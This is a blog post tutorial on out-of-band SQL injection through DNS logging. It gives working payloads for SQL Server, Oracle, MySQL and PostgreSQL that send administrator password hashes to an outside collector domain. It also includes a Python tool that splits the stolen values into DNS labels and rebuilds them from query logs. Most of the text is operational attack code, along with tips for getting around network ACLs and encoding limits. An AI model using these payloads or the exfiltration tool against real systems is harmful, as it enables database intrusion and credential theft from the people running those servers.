Using HawkEye Log/DNS in SQL injection

Hawkeye: http://hawkeye.hackinglab.cn/

Supported database types

  • SQL Server
  • MySQL
  • Oracle
  • PostgreSQL

Injection techniques

Every payload below makes the database server resolve a hostname whose left-most label carries the value being extracted (a password hash in these examples). The lookup lands in the HawkEye DNS log, so the data comes back even when the injected query returns nothing to the client (blind, out-of-band). Two constraints apply to all four dialects: a single DNS label is at most 63 octets and a full name at most 253, so long values have to be cut with SUBSTRING/SUBSTR into several labels and sent one query at a time; and a label should consist of hostname characters only (letters, digits, hyphen), otherwise the resolver may reject the name before any query is sent, so hashes that start with '*' (MySQL) or contain '$', ':' or '/' (PostgreSQL SCRAM, Oracle SPARE4) should be hex-encoded first.

SQL Server

Example:

DECLARE @host varchar(1024);
SELECT @host = (SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)
                FROM sys.sql_logins WHERE name = 'sa') + '.s.livesina.com';
EXEC('master..xp_dirtree "\\' + @host + '\foobar$"');

xp_dirtree takes a UNC path, so the SQL Server host has to resolve the name before it can even try to connect; the query is logged whether or not the share exists. fn_varbintohexstr returns the hash with a 0x prefix, which is hostname-safe, but on SQL Server 2012 and later the hash is 0x0200 + 4-byte salt + 64-byte SHA-512, i.e. 142 characters, well over the 63-octet label limit: take it in pieces with SUBSTRING(..., 1, 63), SUBSTRING(..., 64, 63) and so on, one xp_dirtree call per piece.

Oracle

Example 1 (UTL_INADDR resolves the host directly):

SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com') FROM DUAL;

Example 2 (UTL_HTTP has to look up the host before it can send the request):

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example 3 (HTTPURITYPE, the same effect without calling UTL_HTTP):

SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;

Example 4 (DBMS_LDAP.INIT: the connection attempt resolves the host):

SELECT DBMS_LDAP.INIT('test.s.livesina.com', 80) FROM DUAL;

Example 5 (the same, with the SYS password hash as the first label):

SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com', 80) FROM DUAL;

From 11g onward UTL_INADDR, UTL_HTTP and DBMS_LDAP are all subject to network ACLs (DBMS_NETWORK_ACL_ADMIN); if one package is denied for the current user, try the others. Also on 11g and later SYS.USER$.PASSWORD is often NULL, with the SHA-1 hash kept in SPARE4 as 'S:<hex>'; the ':' is not a hostname character, so wrap the value in RAWTOHEX(UTL_RAW.CAST_TO_RAW(...)) before appending the domain.

MySQL

Example:

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM mysql.user WHERE user='root' LIMIT 1), '.s.livesina.com\\abc'));

LOAD_FILE needs the FILE privilege, and '\\\\host\\share' is a UNC path, so this only fires on a Windows MySQL server. The native hash in mysql.user starts with '*', which is not a hostname character, so wrap it in HEX(); from MySQL 5.7 the column is authentication_string rather than password.

PostgreSQL

Example:

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
    SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
    exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
    EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

After both levels of escaping, the function executes COPY table_output(content) FROM E'\\\\<hash>.s.livesina.com\\foobar.txt', and the server resolves the UNC host before the COPY fails. Reading pg_shadow and COPY FROM a server-side file both require superuser (or pg_read_server_files from PostgreSQL 11), and the UNC path means a Windows server. An md5 hash ('md5' plus 32 hex digits) is hostname-safe as it is; a SCRAM-SHA-256 secret contains '$', ':' and '/' and should go through encode(convert_to(passwd, 'UTF8'), 'hex') first.
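The four payloads above all push one value into a hostname and rely on the collector's query log to get it back. The following is an added example, not code from the original post or from HawkEye: to_labels() performs the split that a payload has to replicate on the database side (hex-encode, then at most 63 octets per label, with a sequence number so every name is unique and cannot be answered from a resolver cache), is_hostname_safe() is the check for whether a raw hash can travel unencoded, and reassemble() is a collector-side parser that rebuilds the value from query-log lines, tolerating duplicates and out-of-order arrival and refusing to return a value with a chunk missing. The log line layout ("<date> <time> <resolver-ip> <qname> <qtype>"), the zone s.livesina.com and the "q" tag label are assumptions for the example, not HawkEye's real format.

```python
# Added example (not from the original post or from HawkEye): both sides of the
# DNS exfiltration channel used by the SQL payloads above.
import re
from binascii import hexlify, unhexlify

MAX_LABEL = 63    # RFC 1035: a label is at most 63 octets
MAX_NAME = 253    # RFC 1035: a presentation-format name is at most 253 octets

HOSTNAME_LABEL = re.compile(r"^[A-Za-z0-9-]{1,63}$")


def is_hostname_safe(value: str) -> bool:
    """True if `value` can travel as a single DNS label without encoding.
    MySQL's '*<sha1>' and PostgreSQL's 'SCRAM-SHA-256$...' both fail this."""
    return bool(HOSTNAME_LABEL.match(value))


def to_labels(secret: bytes, zone: str, tag: str = "q") -> list:
    """Hex-encode `secret` and return one FQDN per chunk, shaped
    <seq>.<hexchunk>.<tag>.<zone>. The sequence number keeps every name
    unique (a repeated name is answered from a resolver cache and never
    reaches the collector) and lets the receiver reorder the queries.
    `zone` and `tag` are assumed values for this example."""
    hexed = hexlify(secret).decode("ascii")
    names = []
    for seq, start in enumerate(range(0, len(hexed), MAX_LABEL)):
        name = f"{seq}.{hexed[start:start + MAX_LABEL]}.{tag}.{zone}"
        if len(name) > MAX_NAME:
            raise ValueError(f"name exceeds {MAX_NAME} octets: {name}")
        names.append(name)
    return names


# Constructed (assumed) log line layout: "<date> <time> <resolver-ip> <qname> <qtype>"
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+)\s+(?P<src>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")


def reassemble(log_lines, zone: str, tag: str = "q") -> bytes:
    """Pick the queries for <tag>.<zone> out of a DNS query log, order them
    by sequence number and decode the hex. Duplicate lines (resolver
    retries) are harmless; a missing sequence number raises instead of
    silently yielding a corrupted value."""
    suffix = f".{tag}.{zone}".lower()
    chunks = {}
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        # DNS names are case-insensitive and some resolvers randomise case
        # (0x20 encoding), so normalise before matching.
        qname = m.group("qname").rstrip(".").lower()
        if not qname.endswith(suffix):
            continue
        seq, _, chunk = qname[:-len(suffix)].partition(".")
        if not seq.isdigit() or not re.fullmatch(r"[0-9a-f]+", chunk):
            continue   # something else under the zone, e.g. a manual probe
        chunks[int(seq)] = chunk
    if not chunks:
        raise ValueError("no chunks for this zone found in the log")
    missing = sorted(set(range(max(chunks) + 1)) - set(chunks))
    if missing:
        raise ValueError(f"missing chunk(s) {missing}; value incomplete")
    return unhexlify("".join(chunks[i] for i in sorted(chunks)))


if __name__ == "__main__":
    zone = "s.livesina.com"
    # Constructed secret in PostgreSQL SCRAM shape: not hostname-safe as-is.
    secret = b"SCRAM-SHA-256$4096:c2FsdA==$stored/key=:server+key="
    print("raw value hostname-safe:", is_hostname_safe(secret.decode()))
    names = to_labels(secret, zone)
    for n in names:
        print("query:", n)
    # Constructed collector log: arrives out of order, with one retried
    # duplicate and an unrelated probe query under the same zone.
    log = [f"2015-10-02 11:36:0{i} 203.0.113.5 {n}. A" for i, n in enumerate(names)]
    log = log[::-1] + log[:1] + ["2015-10-02 11:36:05 203.0.113.5 probe.s.livesina.com. A"]
    print("recovered:", reassemble(log, zone))
```

Because each database dialect above only emits one lookup per statement, the SQL side has to issue the chunks in a loop or as several stacked queries; the hex and 63-octet split is exactly what SUBSTRING over HEX()/RAWTOHEX()/fn_varbintohexstr()/encode(...,'hex') must reproduce.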
posted @ 2015-10-02 11:36  VierAmt